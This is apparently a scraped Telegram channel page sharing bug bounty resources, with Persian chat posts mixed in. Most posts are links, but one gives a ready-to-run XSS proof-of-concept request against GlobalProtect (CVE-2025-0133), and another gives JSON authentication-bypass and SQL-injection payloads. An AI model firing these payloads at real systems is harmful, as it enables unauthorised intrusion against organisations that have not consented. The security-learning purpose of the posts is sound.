uz
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

Kanalga Telegram’da o‘tish
7 429
Obunachilar
+424 soatlar
+207 kunlar
+16430 kunlar
Postlar arxiv

Learning HTTP 2 [ @GitBook_s].pdf5.68 MB

🔰 Learning HTTP/2 🔰
🔰 Learning HTTP/2 🔰

🚨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities. ✅ Download: https://github.com/alihussainzada/BugHunterMethodology/

#WAF #XSS @GitBook_s
#WAF #XSS @GitBook_s

Vulnerability Scanning with Nmap  - Black Hills Information Security, Inc. https://www.blackhillsinfosec.com/vulnerability-scanning-with-nmap/

The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations
The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs. Try your luck by running this PoC
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
http://GitBook_s.t.me

سلام بچه ها ما یه تاپیک زدیم با بچه های امنیت که صرفا از دست حواشی خلاص بشیم و مسیر یادگیری رو بدون پیچ و خم جلو ببریم از شما
سلام بچه ها ما یه تاپیک زدیم با بچه های امنیت که صرفا از دست حواشی خلاص بشیم و مسیر یادگیری رو بدون پیچ و خم جلو ببریم از شما دوستان دعوت میکنم به خانواده ما بپیوندید @sec_gap 👈👈👈 در صورتی که تو جمع خودمون ببینمتون خوشحال میشم ❤️

1) Check request JSON for empty data/array. Auth Bypass Example ❌ {"login":"user", "pass":"asd"} ✅ {} or {"_":"_"} 2) check for SQL Injection in JSON keys SQL injection Example ✅ {"login\" or 1=1 -- -":"user"} 🔗 Article Link https://liveoverflow.com/authentication-bypassing-in-codeigniter-due-to-empty-where-clause/ @GitBook_s

#WAF #XSS @GitBook_s
#WAF #XSS @GitBook_s

این چطور؟

عزیزانی ک پادکست ها رو گوش کردید دو هفته گذشته گوش کردید خوشتون اومد نظر بدید

Bypassing Rate Limit Protection
Bypassing Rate Limit Protection